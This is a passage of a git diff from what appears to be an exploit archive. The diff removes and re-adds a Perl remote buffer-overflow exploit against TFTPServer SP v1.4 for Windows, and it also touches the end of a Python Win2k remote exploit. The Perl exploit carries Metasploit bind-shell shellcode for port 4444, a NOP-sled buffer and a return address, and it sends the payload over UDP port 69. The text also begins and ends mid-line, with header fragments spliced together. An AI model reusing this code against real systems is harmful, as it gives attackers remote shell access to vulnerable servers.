for a TFTP simple program\n";
-
-my $type = defined $ARGV[0] ? shift : 's';
-
-my $shellcode =
-# windows/shell_bind_tcp - 500 bytes
-# http://www.metasploit.com
-# EXITFUNC=seh, LPORT=4444
-"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
-"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
-"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
-"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
-"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
-"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
-"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
-"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
-"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
-"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
-"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
-"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
-"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
-"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
-"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
-"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
-"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
-"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
-"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
-"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
-"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
-"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
-"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
-"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
-"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
-"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
-"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
-"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
-"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
-"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
-"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
-"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
-"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
-"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
-"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
-"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
-
-my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
-
-if ($type =~ /p/i) {
- # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
- # ---------------------------------------------------------------------------
- # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
- # ---------------------------------------------------------------------------
-
- print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
-
- $buffer = "\x90" x 19907 . $shellcode . $RET;
-}
-else {
- # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
- # ------------------------------------------------------------------------
- # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
- # ------------------------------------------------------------------------
-
- print STDOUT "Exploiting TFTPServer Service program\n";
-
- $buffer = "\x90" x 19955 . $shellcode . $RET;
-}
-
-my $sock = IO::Socket::INET->new( PeerAddr => $target,
- PeerPort => 69,
- Proto => 'udp')
- or die "error: $!\n";
-
-$sock->send("\x00\x05" . $buffer, 0);
-
-print STDOUT "done.\n";
-exit 0;
-
-# milw0rm.com [2008-05-08]
+#!/usr/bin/perl
+
+# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
+# The Service or the RunStandAlone version.
+# URL: http://sourceforge.net/projects/tftp-server/
+#
+# Author: tix or tixxDZ for a TFTP simple program\n";
+
+my $type = defined $ARGV[0] ? shift : 's';
+
+my $shellcode =
+# windows/shell_bind_tcp - 500 bytes
+# http://www.metasploit.com
+# EXITFUNC=seh, LPORT=4444
+"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" .
+"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" .
+"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" .
+"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" .
+"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" .
+"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" .
+"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" .
+"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" .
+"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" .
+"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" .
+"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" .
+"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" .
+"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" .
+"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" .
+"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" .
+"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" .
+"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" .
+"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" .
+"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" .
+"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" .
+"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" .
+"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" .
+"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" .
+"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" .
+"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" .
+"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" .
+"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" .
+"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" .
+"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" .
+"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" .
+"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" .
+"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" .
+"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" .
+"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" .
+"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" .
+"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
+
+my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
+
+if ($type =~ /p/i) {
+ # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
+ # ---------------------------------------------------------------------------
+ # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
+ # ---------------------------------------------------------------------------
+
+ print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
+
+ $buffer = "\x90" x 19907 . $shellcode . $RET;
+}
+else {
+ # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
+ # ------------------------------------------------------------------------
+ # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
+ # ------------------------------------------------------------------------
+
+ print STDOUT "Exploiting TFTPServer Service program\n";
+
+ $buffer = "\x90" x 19955 . $shellcode . $RET;
+}
+
+my $sock = IO::Socket::INET->new( PeerAddr => $target,
+ PeerPort => 69,
+ Proto => 'udp')
+ or die "error: $!\n";
+
+$sock->send("\x00\x05" . $buffer, 0);
+
+print STDOUT "done.\n";
+exit 0;
+
+# milw0rm.com [2008-05-08]
diff --git a/platforms/windows/remote/955.py b/platforms/windows/remote/955.py
index 2ffaa2f24..3be4b1bd1 100755
--- a/platforms/windows/remote/955.py
+++ b/platforms/windows/remote/955.py
@@ -186,6 +186,6 @@ if __name__ == '__main__':
exp.setbsize(1014)
exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
- exp.exploit()
-
-# milw0rm.com [2005-04-26]
+ exp.exploit()
+
+# milw0rm.com [2005-04-26]
for a TFTP service\n\t